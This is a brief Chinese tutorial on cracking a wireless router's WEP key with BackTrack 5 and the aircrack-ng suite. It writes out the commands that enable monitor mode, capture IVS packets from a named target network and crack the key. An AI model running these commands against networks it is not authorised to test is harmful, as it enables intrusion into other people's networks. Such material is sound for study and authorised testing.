第一步:
制作可以直接启动的BT5系统U盘,方法参见《U盘启动的制作方法》
第二步:
将机器设为从U盘启动。
第三步: 将制作好的BT5系统U盘插入USB接口,重新启动系统,进入BT5系统。
第四步: 用ifconfig命令查看当前网卡状态
第五步:
使用ifconfig wlan0 up命令激活无线网卡
使用airmon-ng start wlan0 6(6为频道)命令将无线网卡设置为Monitor模式
注:如果遇到有进程占用可以用kill命令杀死进程
此时在用ifconfig命令查看网卡状态可发现mon0
第七步: 在看到预攻击的目标,比如这里SSID名为WIN-LD43I89NQ65_Network的无线路由器。 接下来使用
airodump-ng –ivs –w ppppp –c 6 mon0开始捕获无线ivs数据包
第八步: 在获取的无线数据报文达到一定数量后(一般都是指IVS值达到2万以上时),就可以开始破解。此时不需要将进行捕获数据包的Shell关闭,而是另外开一个Shell进行同步破解。 使用aircrack-ng ppppp-01.ivs命令破解WEP加密。